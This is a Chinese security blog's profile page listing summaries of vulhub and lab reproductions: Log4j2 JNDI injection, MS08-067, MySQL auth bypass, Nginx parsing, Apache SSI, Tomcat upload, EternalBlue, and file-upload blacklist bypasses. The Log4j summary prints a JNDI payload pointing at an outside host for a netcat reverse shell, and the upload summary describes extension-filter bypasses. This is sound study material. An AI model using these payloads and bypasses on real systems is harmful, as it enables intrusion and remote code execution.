自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(15)
  • 收藏
  • 关注

原创 缓冲区溢出MS08-067漏洞复现

MS08-067漏洞全称是“Windows Server 服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。当用户在受影响的系统上受到RPC请求时,该漏洞会允许远程代码执行,攻击者可以在未经身份验证情况下利用此漏洞运行任意代码。同时,该漏洞可以用于蠕虫攻击。

2023-11-09 14:45:52 344 1

原创 Apache Log4j2 lookup JNDI 注入漏洞复现(CVE-2021-44228)

在其2.0到2.14.1版本中存在一处JNDI注入漏洞,log4j的默认配置允许使用解析日志消息中的对象。攻击者可以构造恶意的日志消息,其中包含一个恶意的Java对象,当log4j尝试解析这个对象时,它将会触发漏洞,导致攻击者能够执行任意代码。通过DNSLog平台(http://www.dnslog.cn/)获取到域名http://xxxxxx,构造payload ${jndi:ldap://http://xxxxxx}这里IP是kali的IP,端口是你等会nc监听的端口。JNDI注入反弹shell。

2023-04-02 22:46:57 522

原创 Vulhub复现mysql身份认证绕过漏洞(CVE-2012-2122)

当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。我们可以使用Meterpreter中的模块或者使用特殊的SQL语句进行身份绕过登录,出现这个漏洞是由于memcmp函数只返回返回-128到127范围内的值,在某些平台上进行了优化,导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。爆破多次即绕过身份验证,成功登录数据库,复现成功。2、访问3306端口查看环境。

2023-03-17 11:42:27 292

原创 vulhub Nginx文件解析漏洞

由于用户的配置问题,在php的配置文件中cgi.fix_pathinfo默认开启,当url中有不存在的文件,php会向前递归,将../.jpg/.php解析为/.php文件。将php-fpm.conf中的 security.limit_extensions =.php,只支持php后缀解析。http://IP/uploadfiles/图片.jpg/.php。在文件路径后加上.php,在进行访问,发现php代码已经被执行。访问http://IP/,看到这个页面表示漏洞环境搭建成功。访问文件的路径,正常访问。

2023-03-06 09:26:11 330

原创 文件上传漏洞黑名单绕过

NTFS储存数据流的一个属性,这样我们去访问的时候,我们请求的会被它认为是 phpinfo.php 本身的数据。有时会直接检测你上传的文件,如果你上传了上面规定的文件,他会把你的后缀名去掉,但是他只会过滤一次,这时我们可以用双写进行绕过,只要写两个php就行了,pphphp将php过滤后还剩下php,即可上传成功。然后我们就可以先上传一个.jpg的图片马,然后再上传.htaccess的文件,然后在有.htaccess的文件夹内.jpg就会被解析为.php的文件,然后上传的图片马就可以发挥作用了。

2023-02-27 11:55:36 879

原创 upload-labs靶场的安装搭建

3、将下载的压缩包解压到phpstudy文件,phpstudy/www网站的根目录下。运行镜像docker run -d -p 90:80 cuer/upload-labs。4、本地浏览器访问127.0.0.1/upload-labs/就可以访问靶场了。2、然后到GitHub去下载upload-labs的源码。1、首先安装phpstudy的环境,下载进行安装。将upload-labs镜像拉取到本地仓库。在镜像仓库搜索upload-labs镜像。查看本地镜像,如图下载成功。

2023-02-24 11:44:50 3777

原创 Apache SSI 远程命令执行漏洞复现

访问http://139.9.66.23:8080/upload.php,可以看到一个上传页面。的基于服务器的网页制作技术。文件的默认扩展名是.stm、.shtm和.shtml。如果目标服务器开启了SSI和CGI支持,我们就可以上传shtml的文件,利用。访问一下我们上传的文件,看到如下图的代码,即说明存在远程命令执行漏洞。运行一个支持SSI和CGI的apache服务器。上传一个php的文件,提示上传的文件类型不支持。创建一个shell.shtml文件,内容如下。上传shell.shtml文件,上传成功。

2023-02-20 10:25:17 159

原创 sql注入介绍

SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。在原来的sql语句中插入payload,攻击者注入一段包含注释符的sql语句,将原来的语句的一部分注释,注释掉的部分语句不会被执行。即把sql命令插入到web的请求表单中,欺骗服务器,以此来获取服务器的数据和权限。把用户输入的数据当作代码执行。

2023-02-17 11:45:17 685

原创 Tomcat任意文件上传漏洞(CVE-2017-12615)

2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,其中远程代码执行漏洞(CVE-2017-12615)。一定条件下,攻击者可以利用该漏洞,通过上传的jsp文件,在服务器上执行任意代码,导致数据泄露或权限被获取,存在高安全风险。

2023-02-12 19:47:13 475

原创 破解工具john提示No password hashes loaded (see FAQ)

暴力破解工具john提示No password hashes loaded (see FAQ)1、测试环境kali 2021.1 2、首先将两个密码信息文件合并 3、使用john进行破解,但是提示No password hashes loaded (see FAQ)

2023-02-09 15:06:10 4353 3

原创 Nmap常用命令

nmap是一款非常强大的主机发现和端口扫描工具,而且nmap运用自带的脚本,还能完成漏洞检测,同时支持多平台。

2023-02-08 06:00:00 169

原创 Burpsuite的介绍和使用

Burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。也就是说,Burpsuite是web应用程序渗透测试集成平台。从应用程序攻击表面的最初映射和分析,到寻找和利用安全漏洞等过程。Burpsuite可以高效率的多个工具一起工作。

2023-02-07 11:28:35 2942

原创 Namp的功能与使用

nmap,Network Mapper,是一款强大的主机发现和端口扫描的工具。基本功能:(1)扫描主机端口,嗅探所提供的网络服务(2)探测一组主机是否在线(3)识别主机的操作系统(4)到达主机经过的路由,系统开放的端口。

2023-01-15 11:54:14 4367

原创 Windows下永恒之蓝(MS17-010)漏洞的复现分析

Windows下的MS17-010(永恒之蓝)的复现与分析

2023-01-11 22:21:48 1943

原创 windows系统搭建FTP服务器

Windows快速搭建FTP服务器

2023-01-09 19:51:11 4407

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除